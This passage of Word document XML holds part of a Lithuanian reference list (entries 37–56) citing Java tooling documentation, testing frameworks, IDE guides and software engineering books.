      <w:r w:rsidR="00B956A6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId258" w:history="1">
        <w:r w:rsidR="00B956A6" w:rsidRPr="009C5861">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/help/idea/using-git-integration.html.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="006400"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">37. </w:t>
      </w:r>
      <w:r w:rsidR="00F545C6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrains (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00F545C6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Debugging Your First Java Application</w:t>
      </w:r>
      <w:r w:rsidR="00F545C6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId259" w:history="1">
        <w:r w:rsidR="00F545C6" w:rsidRPr="009C5861">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/help/idea/debugging-your-first-java-application.html.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">38. </w:t>
      </w:r>
      <w:r w:rsidR="00300588" w:rsidRPr="00AD4464">
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidR="009C5861">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00300588" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C5861" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą </w:t>
      </w:r>
      <w:r w:rsidR="00300588" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId260" w:history="1">
        <w:r w:rsidR="00300588" w:rsidRPr="009C5861">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.oracle.com/technetwork/java/javase/downloads/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">39. </w:t>
      </w:r>
      <w:r w:rsidR="008422E3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Koskela, L. (2007). </w:t>
      </w:r>
      <w:r w:rsidR="008422E3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Test Driven: TDD and Acceptance TDD for Java Developers</w:t>
      </w:r>
      <w:r w:rsidR="008422E3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. Manning Publications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">40. </w:t>
      </w:r>
      <w:r w:rsidR="00FA7318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Martin, R. C. (2008). </w:t>
      </w:r>
      <w:r w:rsidR="00FA7318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Clean Code: A Handbook of Agile Software Craftsmanship</w:t>
      </w:r>
      <w:r w:rsidR="00FA7318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. New York: Prentice Hall.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">41. </w:t>
      </w:r>
      <w:r w:rsidR="00B75B1D" w:rsidRPr="00AD4464">
        <w:t>Maven</w:t>
      </w:r>
      <w:r w:rsidR="009C5861">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B75B1D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C5861" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą </w:t>
      </w:r>
      <w:r w:rsidR="00B75B1D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId261" w:history="1">
        <w:r w:rsidR="00B75B1D" w:rsidRPr="009C5861">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://maven.apache.org/download.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">42. </w:t>
      </w:r>
      <w:r w:rsidR="00724DF2" w:rsidRPr="00AD4464">
        <w:t>Matcher</w:t>
      </w:r>
      <w:r w:rsidR="009F5308">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00724DF2" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F5308" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą </w:t>
      </w:r>
      <w:r w:rsidR="00724DF2" w:rsidRPr="009F5308">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId262" w:history="1">
        <w:r w:rsidR="00724DF2" w:rsidRPr="009F5308">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://code.google.com/p/hamcrest/downloads/list</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00724DF2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">43. </w:t>
      </w:r>
      <w:r w:rsidR="003B3CA8" w:rsidRPr="00AD4464">
        <w:t>Maven plugin for Eclipse</w:t>
      </w:r>
      <w:r w:rsidR="009F5308">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003B3CA8" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F5308" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą </w:t>
      </w:r>
      <w:r w:rsidR="003B3CA8" w:rsidRPr="009F5308">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId263" w:history="1">
        <w:r w:rsidR="003B3CA8" w:rsidRPr="009F5308">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://maven.apache.org/download.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="006400"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">44. </w:t>
      </w:r>
      <w:r w:rsidR="00ED66EB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NetBeans (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00ED66EB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NetBeans IDE - The Smarter and Faster Way to Code </w:t>
      </w:r>
      <w:r w:rsidR="00ED66EB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId264" w:history="1">
        <w:r w:rsidR="00ED66EB" w:rsidRPr="006F3FEC">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://netbeans.org/features.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="006400"/>
          <w:u w:val="single"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">45. </w:t>
      </w:r>
      <w:r w:rsidR="00193ECB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NetBeans (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00193ECB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Apache NetBeans Releases</w:t>
      </w:r>
      <w:r w:rsidR="00193ECB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId265" w:history="1">
        <w:r w:rsidR="00193ECB" w:rsidRPr="00193ECB">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://netbeans.apache.org/download/index.html.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">46. </w:t>
      </w:r>
      <w:r w:rsidR="005C1445" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (1999). </w:t>
      </w:r>
      <w:r w:rsidR="005C1445" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Code Conventions for the Java Programming Language</w:t>
      </w:r>
      <w:r w:rsidR="005C1445" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId266" w:history="1">
        <w:r w:rsidR="005C1445" w:rsidRPr="006201C9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:eastAsia="lt-LT"/>
          </w:rPr>
          <w:t>https://www.oracle.com/technetwork/java/codeconvtoc-136057.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005C1445" w:rsidRPr="006201C9">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00602F92" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>47.</w:t>
      </w:r>
      <w:r w:rsidR="005C1445" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidR="005C1445" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>The Java Tutorials</w:t>
      </w:r>
      <w:r w:rsidR="005C1445" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId267" w:history="1">
        <w:r w:rsidR="005C1445" w:rsidRPr="006201C9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:eastAsia="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">48. </w:t>
      </w:r>
      <w:r w:rsidR="00C17104" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Schildt, H. (2017). </w:t>
      </w:r>
      <w:r w:rsidR="00C17104" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Java: The Complete Reference.</w:t>
      </w:r>
      <w:r w:rsidR="00C17104" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> New York: Prentice Hall.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">49. </w:t>
      </w:r>
      <w:r w:rsidR="005C726B">
        <w:t>Selenium WebDriver.</w:t>
      </w:r>
      <w:r w:rsidR="005C726B" w:rsidRPr="005C726B">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C726B" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="005263CE" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId268" w:history="1">
        <w:r w:rsidR="005263CE" w:rsidRPr="005C726B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.seleniumhq.org/projects/webdriver/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">50. </w:t>
      </w:r>
      <w:r w:rsidR="004C6E5C" w:rsidRPr="00AD4464">
        <w:t>TestNG</w:t>
      </w:r>
      <w:r w:rsidR="00DC4A4A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC4A4A" w:rsidRPr="00DC4A4A">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC4A4A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="00DC4A4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C6E5C" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId269" w:history="1">
        <w:r w:rsidR="004C6E5C" w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://testng.org/doc/download.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">51. </w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">TutorialsPoint (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse - Create Java Project</w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId270" w:history="1">
        <w:r w:rsidR="00640272" w:rsidRPr="005C726B">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.tutorialspoint.com/eclipse/eclipse_create_java_project.htm.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">52. </w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">TutorialsPoint (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse - Create Java Package</w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId271" w:history="1">
        <w:r w:rsidR="00640272" w:rsidRPr="00F74A19">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.tutorialspoint.com/eclipse/eclipse_create_java_package.htm.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00640272" w:rsidRPr="00F74A19">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">53. </w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">TutorialsPoint (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse - Create Java Class</w:t>
      </w:r>
      <w:r w:rsidR="00640272" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId272" w:history="1">
        <w:r w:rsidR="00640272" w:rsidRPr="004F3FDD">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.tutorialspoint.com/eclipse/eclipse_create_java_class.htm.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">54. </w:t>
      </w:r>
      <w:r w:rsidR="00F04C81" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Wikipedia (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00F04C81" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Systems development life cycle</w:t>
      </w:r>
      <w:r w:rsidR="00F04C81" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId273" w:history="1">
        <w:r w:rsidR="00F04C81" w:rsidRPr="00483E0D">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Systems_development_life_cycle.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">55. </w:t>
      </w:r>
      <w:r w:rsidR="00467BD2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Wikipedia (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00467BD2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Systems development life cycle</w:t>
      </w:r>
      <w:r w:rsidR="00467BD2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId274" w:history="1">
        <w:r w:rsidR="00467BD2" w:rsidRPr="00483E0D">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Systems_development_life_cycle.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="006400"/>
          <w:u w:val="single"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">56. </w:t>
      </w:r>
      <w:r w:rsidR="00467BD2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Wikipedia (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00467BD2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Introduction to Software Engineering/Process/Life Cycle</w:t>
      </w:r>
      <w:r w:rsidR="00467BD2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId275" w:history="1">
        <w:r w:rsidR="00467BD2" w:rsidRPr="00B820EE">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://en.wikibooks.org/wiki/Introduction_to_Software_Engineering/Process/Life_Cycle.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
